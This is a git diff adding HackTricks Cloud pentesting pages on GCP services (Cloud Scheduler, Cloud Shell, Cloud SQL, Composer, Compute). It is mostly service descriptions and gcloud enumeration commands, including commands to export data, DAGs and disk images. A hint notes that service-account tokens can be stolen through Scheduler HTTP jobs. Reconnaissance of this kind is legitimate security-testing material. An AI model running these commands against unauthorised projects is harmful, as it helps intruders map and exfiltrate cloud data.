+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Google Cloud Scheduler is a fully managed **cron job service** that allows you to run arbitrary jobs—such as batch, big data jobs, cloud infrastructure operations—at fixed times, dates, or intervals. It is integrated with Google Cloud services, providing a way to **automate various tasks like updates or batch processing on a regular schedule**.
+
+Although from an offensive point of view this sounds amazing, it actually isn't that interesting because the service just allow to schedule certain simple actions at a certain time and not to execute arbitrary code.
+
+At the moment of this writing these are the actions this service allows to schedule:
+
+<figure><img src="../../../.gitbook/assets/image (347).png" alt="" width="563"><figcaption></figcaption></figure>
+
+* **HTTP**: Send an HTTP request defining the headers and body of the request.
+* **Pub/Sub**: Send a message into an specific topic
+* **App Engine HTTP**: Send an HTTP request to an app built in App Engine
+* **Workflows**: Call a GCP Workflow.
+
+## Service Accounts
+
+A service account is not always required by each scheduler. The **Pub/Sub** and **App Engine HTTP** types don't require any service account. The **Workflow** does require a service account, but it'll just invoke the workflow.\
+Finally, the regular HTTP type doesn't require a service account, but it's possible to indicate that some kind of auth is required by the workflow and add either an **OAuth token or an OIDC token to the sent** HTTP request.
+
+{% hint style="danger" %}
+Therefore, it's possible to steal the **OIDC** token and abuse the **OAuth** token from service accounts **abusing the HTTP type**. More on this in the privilege escalation page.
+{% endhint %}
+
+Note that it's possible to limit the scope of the OAuth token sent, however, by default, it'll be `cloud-platform`.
+
+## Enumeration
+
+```bash
+# Get schedulers in a location
+gcloud scheduler jobs list --location us-central1
+
+# Get information of an specific scheduler
+gcloud scheduler jobs describe --location us-central1 <scheduler-name>
+```
+
+## Privilege Escalation
+
+{% content-ref url="../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md" %}
+[gcp-cloudscheduler-privesc.md](../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md
new file mode 100644
index 0000000000..d03e8b2883
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md
@@ -0,0 +1,54 @@
+# GCP - Cloud Shell Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Google Cloud Shell is an interactive shell environment for Google Cloud Platform (GCP) that provides you with **command-line access to your GCP resources directly from your browser or shell**. It's a managed service provided by Google, and it comes with a **pre-installed set of tools**, making it easier to manage your GCP resources without having to install and configure these tools on your local machine.\
+Moreover, its offered at **no additional cost.**
+
+**Any user of the organization** (Workspace) is able to execute **`gcloud cloud-shell ssh`** and get access to his **cloudshell** environment. However, **Service Accounts can't**, even if they are owner of the organization.
+
+There **aren't** **permissions** assigned to this service, therefore the **aren't privilege escalation techniques**. Also there **isn't any kind of enumeration**.
+
+Note that Cloud Shell can be **easily disabled** for the organization.
+
+### Post Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md" %}
+[gcp-cloud-shell-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../gcp-persistence/gcp-cloud-shell-persistence.md" %}
+[gcp-cloud-shell-persistence.md](../gcp-persistence/gcp-cloud-shell-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
new file mode 100644
index 0000000000..ee69ced5a2
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
@@ -0,0 +1,115 @@
+# GCP - Cloud SQL Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Google Cloud SQL is a managed service that **simplifies setting up, maintaining, and administering relational databases** like MySQL, PostgreSQL, and SQL Server on Google Cloud Platform, removing the need to handle tasks like hardware provisioning, database setup, patching, and backups.
+
+Key features of Google Cloud SQL include:
+
+1. **Fully Managed**: Google Cloud SQL is a fully-managed service, meaning that Google handles database maintenance tasks like patching, updates, backups, and configuration.
+2. **Scalability**: It provides the ability to scale your database's storage capacity and compute resources, often without downtime.
+3. **High Availability**: Offers high availability configurations, ensuring your database services are reliable and can withstand zone or instance failures.
+4. **Security**: Provides robust security features like data encryption, Identity and Access Management (IAM) controls, and network isolation using private IPs and VPC.
+5. **Backups and Recovery**: Supports automatic backups and point-in-time recovery, helping you safeguard and restore your data.
+6. **Integration**: Seamlessly integrates with other Google Cloud services, providing a comprehensive solution for building, deploying, and managing applications.
+7. **Performance**: Offers performance metrics and diagnostics to monitor, troubleshoot, and improve database performance.
+
+### Password
+
+In the web console Cloud SQL allows the user to **set** the **password** of the database, there also a generate feature, but most importantly, **MySQL** allows to **leave an empty password and all of them allows to set as password just the char "a":**
+
+<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+
+It's also possible to configure a password policy requiring **length**, **complexity**, **disabling reuse** and **disabling username in password**. All are disabled by default.
+
+**SQL Server** can be configured with **Active Directory Authentication**.
+
+### Zone Availability
+
+The database can be **available in 1 zone or in multiple**, of course, it's recommended to have important databases in multiple zones.
+
+### Encryption
+
+By default a Google-managed encryption key is used, but it's also **possible to select a Customer-managed encryption key (CMEK)**.
+
+### Connections
+
+* **Private IP**: Indicate the VPC network and the database will get an private IP inside the network
+* **Public IP**: The database will get a public IP, but by default no-one will be able to connect
+  * **Authorized networks**: Indicate public **IP ranges that should be allowed** to connect to the database
+* **Private Path**: If the DB is connected in some VPC, it's possible to enable this option and give **other GCP services like BigQuery access over it**
+
+<figure><img src="../../../.gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure>
+
+### Data Protection
+
+* **Daily backups**: Perform automatic daily backups and indicate the number of backups you want to maintain.
+* **Point-in-time recovery**: Allows you to recover data from a specific point in time, down to a fraction of a second.
+* **Deletion Protection**: If enabled, the DB won't be able to be deleted until this feature is disabled
+
+### Enumeration
+
+```bash
+# Get SQL instances
+gcloud sql instances list
+gcloud sql instances describe <inst-name> # get IPs, CACert, settings
+
+# Get database names inside an instance (like information_schema, sys...)
+gcloud sql databases list --instance <intance-name>
+gcloud sql databases describe <db-name> --instance <intance-name>
+
+# Get usernames inside the db instance
+gcloud sql users list --instance <intance-name>
+
+# Backups
+gcloud sql backups list --instance <intance-name>
+gcloud sql backups describe <backup-name> --instance <intance-name>
+```
+
+### Unauthenticated Enum
+
+{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md" %}
+[gcp-cloud-sql-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %}
+[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../gcp-persistence/gcp-cloud-sql-persistence.md" %}
+[gcp-cloud-sql-persistence.md](../gcp-persistence/gcp-cloud-sql-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md
new file mode 100644
index 0000000000..f238feb320
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md
@@ -0,0 +1,71 @@
+# GCP - Composer Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+**Google Cloud Composer** is a fully managed **workflow orchestration service** built on **Apache Airflow**. It enables you to author, schedule, and monitor pipelines that span across clouds and on-premises data centers. With GCP Composer, you can easily integrate your workflows with other Google Cloud services, facilitating efficient data integration and analysis tasks. This service is designed to simplify the complexity of managing cloud-based data workflows, making it a valuable tool for data engineers and developers handling large-scale data processing tasks.
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Get envs info
+gcloud composer environments list --locations <loc>
+gcloud composer environments describe --location <loc> <environment>
+
+# Get list of dags
+gcloud composer environments storage dags list --environment <environment> --location <loc>
+# Download dags code
+mkdir /tmp/dags
+gcloud composer environments storage dags export --environment <environment> --location <loc> --destination /tmp/dags
+
+# List Data from composer
+gcloud composer environments storage data list --environment <environment> --location <loc>
+# Download data
+mkdir /tmp/data
+gcloud composer environments storage data export --environment <environment> --location <loc> --destination /tmp/data
+
+# List Plugins from composer
+gcloud composer environments storage plugins list --environment <environment> --location <loc>
+# Download plugins
+mkdir /tmp/plugins
+gcloud composer environments storage data export --environment <environment> --location <loc> --destination /tmp/plugins
+```
+{% endcode %}
+
+### Privesc
+
+In the following page you can check how to **abuse composer permissions to escalate privileges**:
+
+{% content-ref url="../gcp-privilege-escalation/gcp-composer-privesc.md" %}
+[gcp-composer-privesc.md](../gcp-privilege-escalation/gcp-composer-privesc.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md b/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md
new file mode 100644
index 0000000000..d1a0859581
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md
@@ -0,0 +1,262 @@
+# GCP - Compute Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## GCP VPC & Networking
+
+Learn about how this works in:
+
+{% content-ref url="gcp-vpc-and-networking.md" %}
+[gcp-vpc-and-networking.md](gcp-vpc-and-networking.md)
+{% endcontent-ref %}
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# List networks
+gcloud compute networks list
+gcloud compute networks describe <network>
+
+# List subnetworks
+gcloud compute networks subnets list
+gcloud compute networks subnets get-iam-policy <name> --region <region>
+gcloud compute networks subnets describe <name> --region <region>
+
+# List FW rules in networks
+gcloud compute firewall-rules list --format="table(
+                name,
+                network,
+                direction,
+                priority,
+                sourceRanges.list():label=SRC_RANGES,
+                destinationRanges.list():label=DEST_RANGES,
+                allowed[].map().firewall_rule().list():label=ALLOW,
+                denied[].map().firewall_rule().list():label=DENY,
+                sourceTags.list():label=SRC_TAGS,
+                sourceServiceAccounts.list():label=SRC_SVC_ACCT,
+                targetTags.list():label=TARGET_TAGS,
+                targetServiceAccounts.list():label=TARGET_SVC_ACCT,
+                disabled
+            )"
+
+# List Hierarchical Firewalls
+gcloud compute firewall-policies list  (--folder <value>| --organization <value>)
+gcloud compute firewall-policies describe <fw_policy>
+gcloud compute firewall-policies list-rules <fw_policy>
+
+# Get Firewalls of each region
+gcloud compute network-firewall-policies list
+## Get final FWs applied in a region
+gcloud compute network-firewall-policies get-effective-firewalls --network=<vpc_name> --region <region>
+```
+{% endcode %}
+
+You easily find compute instances with open firewall rules with [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_firewall\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_firewall_enum)
+
+## Compute instances
+
+This is the way you can **run virtual machines inside GCP.** Check this page for more information:
+
+{% content-ref url="gcp-compute-instance.md" %}
+[gcp-compute-instance.md](gcp-compute-instance.md)
+{% endcontent-ref %}
+
+### Enumeration
+
+```bash
+# Get list of zones
+# It's interesting to know which zones are being used
+gcloud compute regions list | grep -E "NAME|[^0]/"
+
+# List compute instances & get info
+gcloud compute instances list
+gcloud compute instances describe <instance name>
+gcloud compute instances get-iam-policy <instance> --zone=ZONE
+gcloud compute instances get-screenshot <instance name> # Instace must have "Display Device" enabled
+gcloud compute instances os-inventory list-instances # Get OS info of instances (OS Config agent is running on instances)
+
+
+# Enumerate disks
+gcloud compute disks list
+gcloud compute disks describe <disk>
+gcloud compute disks get-iam-policy <disk>
+```
+
+For more information about how to **SSH** or **modify the metadata** of an instance to **escalate privileges,** check this page:
+
+{% content-ref url="../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %}
+[gcp-local-privilege-escalation-ssh-pivoting.md](../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md)
+{% endcontent-ref %}
+
+### Privilege Escalation
+
+In the following page, you can check how to **abuse compute permissions to escalate privileges**:
+
+{% content-ref url="../../gcp-privilege-escalation/gcp-compute-privesc/" %}
+[gcp-compute-privesc](../../gcp-privilege-escalation/gcp-compute-privesc/)
+{% endcontent-ref %}
+
+### Unauthenticated Enum
+
+{% content-ref url="../../gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md" %}
+[gcp-compute-unauthenticated-enum.md](../../gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../../gcp-post-exploitation/gcp-compute-post-exploitation.md" %}
+[gcp-compute-post-exploitation.md](../../gcp-post-exploitation/gcp-compute-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../../gcp-persistence/gcp-compute-persistence.md" %}
+[gcp-compute-persistence.md](../../gcp-persistence/gcp-compute-persistence.md)
+{% endcontent-ref %}
+
+## Serial Console Logs
+
+Compute Engine Serial Console Logs are a feature that allows you to **view and diagnose the boot and operating system logs** of your virtual machine instances.
+
+Serial Console Logs provide a **low-level view of the instance's boot process**, including kernel messages, init scripts, and other system events that occur during boot-up. This can be useful for debugging boot issues, identifying misconfigurations or software errors, or troubleshooting network connectivity problems.
+
+These logs **may expose sensitive information** from the system logs which low privileged user may not usually see, but with the appropriate IAM permissions you may be able to read them.
+
+You can use the following [gcloud command](https://cloud.google.com/sdk/gcloud/reference/compute/instances/get-serial-port-output) to query the serial port logs (the permission required is `compute.instances.getSerialPortOutput`):
+
+```bash
+gcloud compute instances get-serial-port-output <instance-name>
+```
+
+## Startup Scripts output
+
+It's possible to see the **output of the statup scripts** from the VM executing:
+
+```bash
+sudo journalctl -u google-startup-scripts.service
+```
+
+## OS Configuration Manager
+
+You can use the OS configuration management service to **deploy, query, and maintain consistent configurations** (desired state and software) for your VM instance (VM). On Compute Engine, you must use [guest policies](https://cloud.google.com/compute/docs/os-config-management#guest-policy) to maintain consistent software configurations on a VM.
+
+The OS Configuration management feature allows you to define configuration policies that specify which software packages should be installed, which services should be enabled, and which files or configurations should be present on your VMs. You can use a declarative approach to managing the software configuration of your VMs, which enables you to automate and scale your configuration management process more easily.
+
+This also allow to login in instances via IAM permissions, so it's very **useful for privesc and pivoting**.
+
+{% hint style="warning" %}
+In order to **enable os-config in a whole project or in an instance** you just need to set the **metadata** key **`enable-oslogin`** to **`true`** at the desired level.\
+Moreover, you can set the metadata **`enable-oslogin-2fa`** to **`true`** to enable the 2fa.
+
+When you enable it when crating an instance the metadata keys will be automatically set.
+{% endhint %}
+
+More about **2fa in OS-config**, **it only applies if the user is a user**, if it's a SA (like the compute SA) it won't require anything extra.
+
+### Enumeration
+
+```bash
+gcloud compute os-config patch-deployments list
+gcloud compute os-config patch-deployments describe <patch-deployment>
+
+gcloud compute os-config patch-jobs list
+gcloud compute os-config patch-jobs describe <patch-job>
+```
+
+## Images
+
+### Custom Images
+
+**Custom compute images may contain sensitive details** or other vulnerable configurations that you can exploit.
+
+When an image is created you can choose **3 types of encryption**: Using **Google managed key** (default), a **key from KMS**, or a **raw key** given by the client.
+
+#### Enumeration
+
+You can query the list of non-standard images in a project with the following command:
+
+{% code overflow="wrap" %}
+```bash
+gcloud compute machine-images list
+gcloud compute machine-images describe <name>
+gcloud compute machine-images get-iam-policy <name>
+```
+{% endcode %}
+
+You can then [**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) **the virtual disks** from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation:
+
+```bash
+gcloud compute images export --image test-image \
+    --export-format qcow2 --destination-uri [BUCKET]
+    
+# Execute container inside a docker
+docker run --rm -ti gcr.io/<project-name>/secret:v1 sh
+```
+
+#### Privilege Escalation
+
+Check the Compute Instances privilege escalation section.
+
+### Custom Instance Templates
+
+An [**instance template**](https://cloud.google.com/compute/docs/instance-templates/) **defines instance properties** to help deploy consistent configurations. These may contain the same types of sensitive data as a running instance's custom metadata. You can use the following commands to investigate:
+
+```bash
+# List the available templates
+gcloud compute instance-templates list
+
+# Get the details of a specific template
+gcloud compute instance-templates describe [TEMPLATE NAME]
+```
+
+It could be interesting to know which disk is new images using, but these templates won't usually have sensitive information.
+
+## Snapshots
+
+The **snapshots are backups of disks**. Note that this is not the same as cloning a disk (another available feature).\
+The **snapshot** will use the **same encryption as the disk** it's taken from.
+
+### Enumeration
+
+```bash
+gcloud compute snapshots list
+gcloud compute snapshots describe <snapshot>
+gcloud compute snapshots get-iam-policy <snapshot>
+```
+
+### Privilege Escalation
+
+Check the Compute Instances privilege escalation section.
+
+## References
+
+* [https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md b/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md
new file mode 100644
index 0000000000..89929b36a0
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md
@@ -0,0 +1,127 @@
+# GCP - Compute Instances
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Google Cloud Compute Instances are **customizable virtual machines on Google's cloud infrastructure**, offering scalable and on-demand computing power for a wide range of applications. They provide features like global deployment, persistent storage, flexible OS choices, and strong networking and security integrations, making them a versatile choice for hosting websites, processing data, and running applications efficiently in the cloud.
+
+### Confidential VM
+
+Confidential VMs use **hardware-based security features** offered by the latest generation of AMD EPYC processors, which include memory encryption and secure encrypted virtualization. These features enable the VM to protect the data processed and stored within it from even the host operating system and hypervisor.
+
+To run a Confidential VM it might need to **change** things like the **type** of the **machine**, network **interface**, **boot disk image**.
+
+### Disk & Disk Encryption
+
+It's possible to **select the disk** to use or **create a new one**. If you select a new one you can:
+
+* Select the **size** of the disk
+* Select the **OS**
+* Indicate if you want to **delete the disk when the instance is deleted**
+* **Encryption**: By **default** a **Google managed key** will be used, but you can also **select a key from KMS** or indicate **raw key to use**.
+
+### Deploy Container
+
+It's possible to deploy a **container** inside the virtual machine.\
+It possible to configure the **image** to use, set the **command** to run inside, **arguments**, mount a **volume**, and **env variables** (sensitive information?) and configure several options for this container like execute as **privileged**, stdin and pseudo TTY.
+
